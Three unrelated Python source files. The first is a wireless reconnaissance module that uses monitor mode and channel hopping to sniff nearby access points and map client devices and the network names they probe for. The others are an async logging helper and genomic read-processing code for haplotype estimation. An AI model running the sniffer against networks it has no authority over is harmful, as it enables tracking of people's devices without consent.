"timeout": [0, "Time duration of scan network wireless (ex: 0 infinty)"],
}
completions = list(options.keys())
def __init__(self, parse_args=None, root=None):
self.parse_args = parse_args
self.root = root
self.name_module = self.name
self.whitelist = ["00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"]
self.aps = {}
self.clients = {}
self.table_headers_wifi = [
"CH",
"SSID",
"BSSID",
"RSSI",
"Privacy",
]
self.table_headers_STA = ["BSSID", "STATION", "PWR", "Frames", "Probe"]
self.table_output = []
super(ModPump, self).__init__(parse_args=self.parse_args, root=self.root)
def do_run(self, args):
""" execute module """
print(
display_messages(
"setting interface: {} monitor momde".format(
setcolor(self.options.get("interface")[0], color="green")
),
info=True,
)
)
self.set_monitor_mode("monitor")
print(display_messages("starting Channel Hopping ", info=True))
self.p = Process(
target=self.channel_hopper, args=(self.options.get("interface")[0],)
)
self.p.daemon = True
self.p.start()
print(display_messages("sniffing... ", info=True))
sniff(
iface=self.options.get("interface")[0],
prn=self.sniffAp,
timeout=None
if int(self.options.get("timeout")[0]) == 0
else int(self.options.get("timeout")[0]),
)
self.p.terminate()
self.set_monitor_mode()
print(display_messages("thread sniffing successfully stopped", info=True))
def channel_hopper(self, interface):
while True:
try:
channel = randrange(1, 11)
os.system("iw dev %s set channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt:
break
def handle_probe(self, pkt):
if (
pkt.haslayer(Dot11ProbeReq)
and "\x00".encode() not in pkt[Dot11ProbeReq].info
):
essid = pkt[Dot11ProbeReq].info
else:
essid = "Hidden SSID"
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
return
if client not in self.clients:
self.clients[client] = []
if essid not in self.clients[client]:
self.clients[client].append(essid)
self.aps["(not associated)"] = {}
self.aps["(not associated)"]["STA"] = {
"Frames": 1,
"BSSID": "(not associated)",
"Station": client,
"Probe": essid,
"PWR": self.getRSSIPacketClients(pkt),
}
def getRSSIPacket(self, pkt):
rssi = -100
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype == 8:
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
rssi = pkt[RadioTap].dBm_AntSignal
return rssi
def getRSSIPacketClients(self, pkt):
rssi = -100
if pkt.haslayer(RadioTap):
rssi = pkt[RadioTap].dBm_AntSignal
return rssi
def getStationTrackFrame(self, pkt):
if (
pkt.haslayer(Dot11)
and pkt.getlayer(Dot11).type == DOT11_REQUEST_SUBTYPE
and not pkt.haslayer(EAPOL)
):
sender = pkt.getlayer(Dot11).addr2
receiver = pkt.getlayer(Dot11).addr1
if sender in self.aps.keys():
if Linux.check_is_mac(receiver):
if not receiver in self.whitelist:
self.aps[sender]["STA"] = {
"Frames": 1,
"BSSID": sender,
"Station": receiver,
"Probe": "",
"PWR": self.getRSSIPacketClients(pkt),
}
if "STA" in self.aps[sender]:
self.aps[sender]["STA"]["Frames"] += 1
self.aps[sender]["STA"]["PWR"] = self.getRSSIPacketClients(pkt)
elif receiver in self.aps.keys():
if Linux.check_is_mac(sender):
if not sender in self.whitelist:
self.aps[receiver]["STA"] = {
"Frames": 1,
"BSSID": receiver,
"Station": sender,
"Probe": "",
"PWR": self.getRSSIPacketClients(pkt),
}
if "STA" in self.aps[receiver]:
self.aps[receiver]["STA"]["Frames"] += 1
self.aps[receiver]["STA"]["PWR"] = self.getRSSIPacketClients(
pkt
)
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
essid = (
pkt[Dot11Elt].info
if "\x00".encode() not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != ""
else "Hidden SSID"
)
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if (
client in self.whitelist
or essid in self.whitelist
or bssid in self.whitelist
):
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
rssi = self.getRSSIPacket(pkt)
p = pkt[Dot11Elt]
capability = p.sprintf(
"{Dot11Beacon:%Dot11Beacon.cap%}\
{Dot11ProbeResp:%Dot11ProbeResp.cap%}"
)
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith("\x00P\xf2\x01\x01\x00".encode()):
crypto.add("WPA")
p = p.payload
if not crypto:
if "privacy" in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = "/".join(crypto)
self.aps[bssid] = {
"ssid": essid,
"channel": channel,
"capability": capability,
"enc": enc,
"rssi": rssi,
}
def showDataOutputScan(self):
os.system("clear")
self.table_output = []
self.table_station = []
for bssid, info in self.aps.items():
if not "(not associated)" in bssid:
self.table_output.append(
[info["channel"], info["ssid"], bssid, info["rssi"], info["enc"]]
)
display_tabulate(self.table_headers_wifi, self.table_output)
print("\n")
for bssid, info in self.aps.items():
if "STA" in info:
self.table_station.append(
[
info["STA"]["BSSID"],
info["STA"]["Station"],
info["STA"]["PWR"],
info["STA"]["Frames"],
info["STA"]["Probe"],
]
)
if len(self.table_station) > 0:
display_tabulate(self.table_headers_STA, self.table_station)
print(display_messages("press CTRL+C to stop scanning", info=True))
def sniffAp(self, pkt):
self.getStationTrackFrame(pkt)
if (
pkt.haslayer(Dot11Beacon)
or pkt.haslayer(Dot11ProbeResp)
or pkt.haslayer(Dot11ProbeReq)
):
if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
self.handle_probe(pkt)
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
self.handle_beacon(pkt)
self.showDataOutputScan()
def set_monitor_mode(self, mode="manager"):
if not self.options.get("interface")[0] in Linux.get_interfaces().get("all"):
print(display_messages("the interface not found!", error=True))
sys.exit(1)
os.system("ifconfig {} down".format(self.options.get("interface")[0]))
os.system("iwconfig {} mode {}".format(self.options.get("interface")[0], mode))
os.system("ifconfig {} up".format(self.options.get("interface")[0]))
|
logging.py
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async import run_coroutine_threadsafe
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
yield from self._queue.put(None)
if blocking:
while self._thread.is_alive():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""Return the string names."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
if record is None:
self.handler.close()
return
self.handler.emit(record)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self):
"""Wrap property set_name to handler."""
return self.handler.get_name()
@name.setter
def name(self, name):
"""Wrap property get_name to handler."""
self.handler.name = name
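# Minimal usage sketch (assumption: `loop` is an already running asyncio event loop):
#   handler = AsyncHandler(loop, logging.StreamHandler())
#   handler.emit(logging.makeLogRecord({"msg": "hello"}))   # queued onto the loop, written by the worker thread
#   # later, from a coroutine: yield from handler.async_close(blocking=True)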
|
bamprocess_regression.py
|
# Functions used by AcroPoly algorithm to process the bam file, scan the genomic region, get EM dosages and report them in the desired format.
# Written by Ehsan Motazedi, Wageningen UR, 21-01-2018.
# Last modified: 08-09-2018.
import copy
import itertools
import math
import multiprocessing as mpthread
import numpy as np
import pysam
import re
import subprocess
import sys
import threading
from collections import OrderedDict
from cStringIO import StringIO
from genotypes import getAllelesPop, getGenotypesPop
from haplotypes import Haplotypes
from math import log
from reads import Read
#from scipy.misc import factorial as fact
MAXCORES = mpthread.cpu_count()-1 # Max number of available cores
NCORES = 8 # desired number of cores to use
logfactorial_table = {n: sum(log(_n) for _n in range(1,n+1)) for n in range(0,1001)}
Global_Sema = None # Global Semaphore not initialized yet
class BlockException(Exception):
def __init__(self, value):
super(BlockException, self).__init__(value)
self.args = (value,)
def __str__(self):
return "{}".format(':'.join(str(_arg) for _arg in self.args))
def __repr__(self):
return self.args
class Capturing(list):
"""class defined to temporarily redirect stdout and capture what is written in a list. To be used in 'with' statement block."""
def __enter__(self):
self._stdout = sys.stdout
sys.stdout = self._stringio = StringIO()
return self
def __exit__(self, *args):
self.extend(self._stringio.getvalue().splitlines())
del self._stringio # free up some memory
self._stdout.flush()
sys.stdout = self._stdout
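# Minimal usage sketch for Capturing (illustrative):
#   with Capturing() as captured:
#       print("hello")
#   # captured now holds ["hello"] instead of the text reaching the terminal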
def GetSemaLock(useglobal=True):
""" Return the semaphore and lock objects needed for multi threading."""
global NCORES
global MAXCORES
global Global_Sema
if min(NCORES, MAXCORES)>1:
if useglobal: # use a global semaphore
if Global_Sema is None:
Global_Sema = mpthread.BoundedSemaphore(min(NCORES, MAXCORES))
else: # use a local semaphore at each call to BranchPop
sema = mpthread.BoundedSemaphore(min(NCORES, MAXCORES))
lock = mpthread.Lock()
Parallel = True
else: # If parallel execution is not possible (as just one core could be used), concurrent execution is performed using threads.
if useglobal:
if Global_Sema is None:
Global_Sema = threading.BoundedSemaphore(NCORES)
else:
sema = threading.BoundedSemaphore(NCORES)
lock = threading.Lock()
Parallel = False
if useglobal:
return Global_Sema, lock , Parallel
else:
return sema, lock , Parallel
def thread_func(sema, lock, q, func, *args, **kwargs):
""" thread to call func with args and put the return value in q. """
_locked = False
try:
b = func(*args, **kwargs)
_locked = lock.acquire()
q.append(b)
except:
raise
finally:
if _locked:
lock.release()
sema.release()
class Infix:
def __init__(self, function):
self.function = function
def __ror__(self, other):
return Infix(lambda x, self=self, other=other: self.function(other, x))
def __or__(self, other):
return self.function(other)
def __rlshift__(self, other):
return Infix(lambda x, self=self, other=other: self.function(other, x))
def __rshift__(self, other):
return self.function(other)
def __call__(self, value1, value2):
return self.function(value1, value2)
mulx = Infix(lambda X, Y: [[sum(a*b for a,b in zip(X_row,Y_col)) for Y_col in zip(*Y)] for X_row in X]) # matrix multiplication |x|
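# Quick worked example of the |mulx| infix matrix product (illustrative values):
#   [[1, 2], [3, 4]] |mulx| [[5], [6]]  ->  [[17], [39]]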
def adjust_seq(read):
""" Adjust the read sequence according to the mapped positions, i.e. get read of the insertions and clipped bases."""
cig = list(_x for _x in re.split('[0-9]{1,}', read.cigarstring) if _x)
cign = list(_x for _x in re.split('[^0-9]', read.cigarstring) if _x)
cig = list(cig[_n]*int(cign[_n]) for _n in range(0, len(cig)))
cig = ''.join(_x for _x in cig if 'D' not in _x) # deleted nucleotides from the reference are not present in the read sequence
adj_seq=[]
for _n, _x in enumerate(read.seq):
if cig[_n]=='M': # Allow only match/mismatch of the read nucleotides, i.e. no clipping, no insertion.
adj_seq.append(_x)
return ''.join(adj_seq)
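# Illustrative example (hypothetical read): cigarstring "2M1I3M" with seq "AATGGC" expands to
# the per-base operations "MMIMMM"; only the 'M' bases are kept, so the adjusted sequence
# becomes "AAGGC" (the inserted 'T' is dropped).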
def frag_gen(varpos, allelelst, genolst, coordinates, nucleotides, qscores):
""" Generate SNP-fragments from (paired-end) reads."""
if (not coordinates) or (not nucleotides):
return Read(), {}
var_codes = []
var_num = []
var_q = []
for _n, _x in enumerate(varpos):
if _x < coordinates[0]:
continue
if _x > coordinates[-1]:
break
if _x in coordinates:
if set(genolst[_n].GetGenes()).intersection(set(['.','-'])): # Throw away missing genotypes or genotypes with one or more missing allele(s)
continue
#if len(set(genolst[_n].GetGenes()))<2: # Do not include in the SNP-fragments belonging to a population member its homozygous alleles
# continue
try:
var_codes.append(allelelst[_n][2][nucleotides[coordinates.index(_x)]])
var_num.append(allelelst[_n][0])
var_q.append(qscores[coordinates.index(_x)])
except KeyError: # if the called nucleotide is wrong, i.e. does not exist in VCF alleles
pass
return Read({_x:str(_y) for _x, _y in zip(var_num, var_codes)}), {_x:str(_y) for _x, _y in zip(var_num, var_q)} # return the reads {SNP number: allele} and the associated quality scores {SNP number: Qscore}
class InputError(Exception):
""" Handle invalid input specifications."""
def __init__(self, msg, *args):
super(InputError, self).__init__(args)
self.msg = msg
def __str__(self):
return "InputError: {}\n".format(self.msg)
def __repr__(self):
return (self.msg,)+self.args+('\n',)
def get_expectation(haplodict, M):
"""calculate the expected count of each possible haplotype within a window, using the current haplotype rate
estimates and the compatibility matrix M. Part of the EM-algorithm to get the expectation of the unknown counts
in the likelihood function for the reads: P(R|k_1,...,k_N,u_1,...,u_N) ~ Pois(k_1|lu_1)...Pois(k_N|lu_N) (with
l the length of the haplotypes in SNPs). Having M, the matrix showing compatibility of reads (each read one row)
with the haplotypes (each haplotype one column, values of course 0 and 1), it is easy to calculate k_i assuming
a multinomial model for the assignment of each read. U is the vector of haplotype specific Poisson rates. Expected number of
each haplotype h_j, i.e. k_j, will be: sum over the reads (U_j.I(r_i|H_j) divided by the sum of U_k for h_k
compatible with r_i)."""
c = len(M) # total number of reads overlapping with the current region for the current sample
N = len(haplodict) # number of possible haplotypes for the region
count_dict = OrderedDict()
haplo_freq = [_u for _u in haplodict.values()]
frag_prob = np.transpose(np.dot(np.diag(haplo_freq), np.transpose(M)))
#frag_prob_norm = M |mulx| [[_f] for _f in haplo_freq] # sum of U_k for h_k compatible with r_i
frag_prob_norm = np.dot(M, [[_f] for _f in haplo_freq]) # sum of U_k for h_k compatible with r_i
frag_prob = [[frag_prob[_i][_j] / float(frag_prob_norm[_i][0]) for _j in range(0, N)] for _i in range (0, c)]
expectations = np.dot([[1 for _i in range(0,c)]], frag_prob)
for _j, _h in enumerate(haplodict.keys()):
count_dict[_h] = expectations[0][_j]
return count_dict
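# Tiny worked example of the expectation step (illustrative values, not real data):
#   haplos = OrderedDict([(('0','0'), 0.5), (('0','1'), 0.5)])
#   M = [[1, 0],        # read 0 is compatible only with the first haplotype
#        [1, 1]]        # read 1 is compatible with both
#   get_expectation(haplos, M)  # -> expected counts of 1.5 and 0.5, respectively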
def get_frags(bamfile, vcffile, maxIS=3000, mbq=13, mmq=20, qoffset=33):
"""
Make the SNP-fragment list from a multi-sample bam file and its corresponding VCF file with input options: mmq, mbq, maxIS and qoffset.
Modified from the original version for read-based regression. Specifically, read length does NOT need to be at least 2 here, and homozygous sites of each
individual are also included.
mmq : minimum read mapping quality to consider a read for phasing, default 20\n
qoffset <33/64> : quality value offset, 33/64 depending on how quality values were encoded, default is 33\n
mbq : minimum base quality to consider a base for haplotype fragment, default 13\n
maxIS : maximum insert-size for a paired-end read to be considered as a single fragment for phasing, default 3000.\n
"""
try:
all_reads = pysam.Samfile(bamfile, 'rb')
except IOError:
raise InputError('The input BAM file was not found!')
ReadHeader = subprocess.Popen(["samtools","view","-H", bamfile], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
header, err_header = ReadHeader.communicate()
if ReadHeader.returncode!=0:
raise InputError('Failed to read the header from the bam file! Original error message:\n'+err_header)
if isinstance(header, bytes):
header=bytes.decode(header)
else:
pass
RGIDs, SMnames = [], []
for _headerline in header.splitlines(): # parse the header of the bam file to extract the ID and SM fields of each Read Group
if _headerline[0:3]=='@RG':
RGID_added, SM_added = False, False
for _n, _field in enumerate(_headerline.split()):
if 'ID' in _field:
if not RGID_added:
RGIDs.append(''.join(_headerline.split()[_n].split(':')[1:])) # add read group ID
RGID_added = True
else:
raise InputError('Double ID fields detected in @RG header line!')
elif 'SM' in _field:
if not SM_added:
SMnames.append(''.join(_headerline.split()[_n].split(':')[1:])) # add the sample name associated with the read group ID
SM_added = True
else:
raise InputError('Double SM fields detected in @RG header line!')
if SM_added and RGID_added:
pass
elif SM_added:
raise InputError('ID field missing in @RG header line!')
elif RGID_added:
raise InputError('SM field missing in @RG header line!')
else:
raise InputError('ID and SM fields missing in @RG header line!')
if len(RGIDs)!=len(set(RGIDs)):
raise InputError('Duplicate read group IDs detected in the bam header!')
GroupedReadsWithID = [[] for _id in RGIDs] # separate reads belonging to each Read Group
for _read in all_reads:
GroupedReadsWithID[RGIDs.index(dict(_read.get_tags())['RG'])].append(_read)
GroupedReads, GroupedSM = [], [] # combine the reads with different RGID but the same SM as they are assumed to belong to the same sample
for _SMname, _ReadGroup in zip(SMnames, GroupedReadsWithID):
if _SMname not in GroupedSM:
GroupedReads.append(_ReadGroup)
GroupedSM.append(_SMname)
else:
GroupedReads[GroupedSM.index(_SMname)]+=_ReadGroup
del GroupedReadsWithID
try:
genolst = getGenotypesPop(vcffile, GroupedSM)
allelelst = getAllelesPop(vcffile, GroupedSM)
except IOError:
raise InputError('The VCF file was not found!')
except:
raise
Frag_lsts, Q_lsts = [], []
varpos = list(_x[1] for _x in allelelst)
for _group, reads in enumerate(GroupedReads):
frag_lst, q_lst = [], []
reads = sorted(reads, key= lambda _x: (_x.qname, _x.flag & 0x900)) # sort the alignments using their names, with the primary alignments being placed first.
_rnum = 0
rNUM = len(reads)
while _rnum < rNUM: # scan through the alignments to find the pairs/singles
break_mate = False
is_proper_pair = False
read = copy.deepcopy(reads[_rnum])
if read.is_unmapped or read.is_duplicate or (read.flag & 0x900): # throw away unmapped reads, duplicates and secondary/supplementary alignments
_rnum+=1
continue
try:
if read.qname == reads[_rnum+1].qname: # means the read is paired to a mate or has multiple/supplementary alignments
if reads[_rnum+1].is_unmapped or reads[_rnum+1].is_duplicate or (reads[_rnum+1].flag & 0x900): # if the next read is unmapped, a duplicate or not primary: skip it
pass
else:
is_proper_pair = True # means the read is paired to a proper mate
mate = copy.deepcopy(reads[_rnum+1])
_rnum+=2
else: # means the read is single
_rnum+=1
except IndexError: # could occur for the last read in the alignments' list
_rnum+=1
if is_proper_pair:
if (max(mate.positions+read.positions)-min(mate.positions+read.positions)+1)>maxIS: # Check the maximum insert-size to consider the mates as a single fragment
break_mate = True
if read.mapping_quality >= mmq:
try:
coordinates, nucleotides, quals = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(read.positions, adjust_seq(read).upper(), list(ord(_x)-qoffset for _x in read.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals= [(), (), ()]
else:
raise
else:
coordinates, nucleotides, quals = [(), (), ()]
if mate.mapping_quality >= mmq:
try:
coordinates_mate, nucleotides_mate, quals_mate = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(mate.positions, adjust_seq(mate).upper(), list(ord(_x)-qoffset for _x in mate.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
else:
raise
else:
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
if break_mate:
pass
else: # merge the sub-reads if the insert-size is less than maxIS
try:
coordinates, nucleotides, quals = list(zip(*sorted(zip(coordinates+coordinates_mate, nucleotides + nucleotides_mate, quals+quals_mate), key = lambda x: x[0])))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals = [(), (), ()]
else:
raise
else:
break_mate = True
if read.mapping_quality >= mmq:
try:
coordinates, nucleotides, quals = list(zip(*[(_x, _y, _z) for _x, _y, _z in zip(read.positions, adjust_seq(read).upper(), list(ord(_x)-qoffset for _x in read.qual)) if _z>=mbq]))
except ValueError as e:
if e.args[0][0:len("need more than 0 values to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
coordinates, nucleotides, quals = [(), (), ()]
else:
raise
else:
coordinates, nucleotides, quals = [(), (), ()]
coordinates_mate, nucleotides_mate, quals_mate = [(), (), ()]
if break_mate:
pass
else:
unique_q = []
unique_c = []
unique_n = []
for _n, _c in enumerate(coordinates): # remove the duplicates from overlapping positions
try:
if unique_c[-1]!=_c:
unique_c.append(_c)
unique_n.append(nucleotides[_n])
unique_q.append(quals[_n])
elif unique_n[-1]==nucleotides[_n]:
unique_q[-1] = min(126-qoffset, unique_q[-1]+quals[_n])
else: # if the called nucleotides differ at overlapping sites, use the one with the highest Phred score and adjust the Phred score.
if quals[_n]>unique_q[-1]:
_new_q_score = round(-10*log(1-10**(-unique_q[-1]/10)*(1-10**(-quals[_n]/10)), 10), 5) # Q=-10log(p,10)
if _new_q_score >= mbq:
unique_n[-1] = nucleotides[_n]
unique_q[-1] = _new_q_score
else:
del(unique_c[-1], unique_n[-1], unique_q[-1])
else:
_new_q_score = round(-10*log(1-(1-10**(-unique_q[-1]/10))*10**(-quals[_n]/10), 10), 5)
if _new_q_score >= mbq:
unique_q[-1] = _new_q_score
else:
del(unique_c[-1], unique_n[-1], unique_q[-1])
except IndexError:
unique_c.append(_c)
unique_n.append(nucleotides[_n])
unique_q.append(quals[_n])
coordinates, nucleotides, quals = [unique_c, unique_n, unique_q]
coordinates = list(_x+1 for _x in coordinates) # Convert the zero-based BAM coordinates to 1-based, as the coordinates are 1-based in the VCF (like the SAM format).
new_frag, new_q = frag_gen(varpos, allelelst, genolst[_group], coordinates, nucleotides, quals)
frag_lst.append(new_frag)
q_lst.append(new_q)
if break_mate:
coordinates_mate = list(_x+1 for _x in coordinates_mate)
new_frag_mate, new_q_mate = frag_gen(varpos, allelelst, genolst[_group], coordinates_mate, nucleotides_mate, quals_mate)
frag_lst.append(new_frag_mate)
q_lst.append(new_q_mate)
try:
frag_lst, q_lst = [_lst for _lst in zip(*[(_x, _y) for _x, _y in zip(frag_lst, q_lst) if not _x.isNULL()])]
except ValueError as e:
if e.args[0][0:len("need more than 0 val:ques to unpack")]=="need more than 0 values to unpack" or e.args[0][0:len("not enough values to unpack")]=="not enough values to unpack":
frag_lst, q_lst = [], []
Frag_lsts.append(frag_lst)
Q_lsts.append(q_lst)
return Frag_lsts, Q_lsts, GroupedSM
def get_haplos(bamfile, vcffile, windowsize = 3, shiftsize = 1, eps=1e-06, eps_rel=1e-04, maxit=5000, use_relative=False, maxIS=500, mbq=10, mmq=9, qoffset=33, min_cov = 4, expression=True, deterministic=False, verbose=False):
"""scan the SNPs given by vcffile, using a window of size winodwsize and window shifts of size shiftsize, and estimate haplotype frequencies for each window.
Finally, bridge the windows by starting from the leftmost window and stacking consecutive windows upon each other."""
output = []
sema, lock , Parallel = GetSemaLock(True)
threads = []
if Parallel:
manager = mpthread.Manager()
Frag_lsts, Q_lsts, Samples = get_frags(bamfile, vcffile, maxIS, mbq, mmq, qoffset)
if not Samples:
raise InputError('No sample name included in the bam header!')
alleleSet = [str(_allele) for _allele in set(_x for _y in getAllelesPop(vcffile, Samples) for _x in _y[2].values())] # obtain the set of alleles observed at all variation sites
varpos = [] # obtain the variant positions from the vcf file
ploidy = [0 for _sample in Samples]
contigs = []
with open(vcffile, 'rU') as _vcfh:
for _line in _vcfh:
if '#'!=_line.strip()[0]:
varpos.append(_line.strip().split()[1])
contigs.append(_line.strip().split()[0])
if not all(ploidy): # determine the ploidy levels of each sample
_genotype_fields = [_x.split(':')[0] for _x in _line.strip().split()[9:]]
if not all(_x=='.' for _x in _genotype_fields):
for _n, _x in enumerate(_genotype_fields):
if not ploidy[_n]:
ploidy[_n] = len(_x.split('/')) if _x!='.' else ploidy[_n]
if len(set(contigs))>1:
raise BlockException('All of the variants must be located on the same contig for phasing! Check the VCF file!')
contig = contigs[0]
if not all(ploidy):
raise BlockException('Ploidy levels could not be detected for some of the samples! Check the VCF file!')
l = len(varpos)
if Parallel:
_window_haps = [manager.list() for _start in range(0, l-windowsize+shiftsize, shiftsize)] # shiftsize must be <= windowsize-2 for informative overlapping between the windows
else:
_window_haps = [[] for _start in range(0, l-windowsize+shiftsize, shiftsize)] # ordinary lists suffice for multiple threads belonging to the same process
_index = -1
_start = -1*shiftsize
while _start<(l-windowsize):
_index+=1
_start+=shiftsize
if Parallel:
t = mpthread.Process(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, _window_haps[_index], make_data_for_window,
varpos[_start:_start+windowsize],Frag_lsts, Q_lsts, Samples, vcffile, None, eps, eps_rel, maxit, use_relative),
kwargs = {'queue':True, 'verbose':verbose, 'maxIS':maxIS, 'mmq':mmq, 'mbq':mbq, 'qoffset':qoffset, 'expression':expression, 'varpos':varpos,
'alleles':alleleSet, 'min_cov':min_cov, 'Parallel':Parallel})
else:
t = threading.Thread(target=thread_func, name = "Haplotype window {0:d}".format(_index+1),
args = (sema, lock, _window_haps[_index], make_data_for_window,
varpos[_start:_start+windowsize],Frag_lsts, Q_lsts, Samples, vcffile, None, eps, eps_rel, maxit, use_relative),
kwargs = {'queue':True, 'verbose':verbose, 'maxIS':maxIS, 'mmq':mmq, 'mbq':mbq, 'qoffset':qoffset, 'expression':expression, 'varpos':varpos,
'alleles':alleleSet, 'min_cov':min_cov, 'Parallel':Parallel})
sema.acquire()
threads.append(t)
t.start()
for _thread in threads:
_thread.join()
if Parallel:
window_haps = [list(_lprox)[0] if len(_lprox) else [] for _lprox in _window_haps] # empty dictionaries reported when coverage is too low
else:
window_haps = [_l[0] if len(_l) else [] for _l in _window_haps] # empty dictionaries reported when coverage is too low
Haplotype_Blocks = dict()
for _sample in Samples:
_window_dics = {}
for _n, _win in enumerate(window_haps):
_window_dics[_n] = _win[_sample]
Haplotype_Blocks[_sample] = bridge_windows(_window_dics, shiftsize, windowsize, alleleSet, deterministic) # now combine the atomic windows one by one
_sample_num = -1
for _sample in Samples:
_sample_num+=1
if not deterministic:
with Capturing() as _output:
sys.stdout.write('Haplotype estimates for {}:\n'.format(_sample))
for _block_num in range(0, len(Haplotype_Blocks[_sample])):
sys.stdout.write('--->Block {0:d} on {1:s}:\n'.format(_block_num+1, contig))
_n = 0
for _H in Haplotype_Blocks[_sample][_block_num]:
_n+=1
sys.stdout.write('\tH_{0:d}: {1:s}\n\tStart: {3:d} ({5:s} bp), Stop: {4:d} ({6:s} bp), Prob H_{0:d}: {2:.5f}\n'.format(_n, ''.join(_H.GetVS()[0]), _H.GetRL(), _H.GetStart()+1, _H.GetStop()+1, varpos[_H.GetStart()], varpos[_H.GetStop()]))
sys.stdout.write('*******************\n')
sys.stdout.flush()
else:
with Capturing() as _output:
for _block_num in range(0, len(Haplotype_Blocks[_sample])):
columns = [[], []]+ [[] for _x in range(0, ploidy[_sample_num])]
sys.stdout.write('BLOCK_{0:d}_from_{1:s}bp_to_{2:s}bp\t{5:d}_SNPs\t{3:d}\t{4:d}\n'.format(_block_num+1, varpos[Haplotype_Blocks[_sample][_block_num][0].GetStart()], varpos[Haplotype_Blocks[_sample][_block_num][0].GetStop()], Haplotype_Blocks[_sample][_block_num][0].GetStart()+1, Haplotype_Blocks[_sample][_block_num][0].GetStop()+1, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))) # write the header
#columns[0] = ['.' for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] # contig column in the individual solution
columns[0] = [contig for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] # contig column in the individual solution
columns[1] = [varpos[_pos] for _pos in range(Haplotype_Blocks[_sample][_block_num][0].GetStart(), Haplotype_Blocks[_sample][_block_num][0].GetStop()+1)] # variant position column in the individual solution
for _h in range(2, ploidy[_sample_num]+2):
columns[_h] = ['-' for _pos in range(Haplotype_Blocks[_sample][_block_num][0].GetStart(), Haplotype_Blocks[_sample][_block_num][0].GetStop()+1)] # initially undetermined haplotypes
_h = 2
try:
for _H in Haplotype_Blocks[_sample][_block_num]:
for _hh in range(0, int(round(_H.GetRL()*ploidy[_sample_num]))): # convert fraction dosages to integer dosages
try:
columns[_h+_hh] = _H.GetVS()[0] # write a homologue d times with d being its integer dosage
except IndexError:
sys.stderr.write("WARNING: Dubious rounding of fractional dosages to integer! Maybe better to use fractional dosages instead of the deterministic!\n")
break
_h += int(round(_H.GetRL()*ploidy[_sample_num]))
except ValueError:
sys.stderr.write("WARNING: Undefined haplotype probabilities encountered in block {0:d}, sample {1:s}!\n".format(_block_num, _sample))
if any(_h==['.' for _pos in range(0, len(Haplotype_Blocks[_sample][_block_num][0].GetVS()[0]))] for _h in columns[2:]):
sys.stderr.write("WARNING: Some of the haplotypes could not be reliably determined and are therefore missing! Maybe better to use fractional dosages instead of the deterministic!\n")
for _row in range(0, len(columns[0])):
sys.stdout.write('\t'.join(str(_col[_row]) for _col in columns)+'\n')
output.append(_output)
if not deterministic:
return output # return the log report with global haplotype markers and their dosages
else:
return {_sample:_output for _sample, _output in zip(Samples, output)} # return a dictionary with sample names as keys and determined haplotypes as values
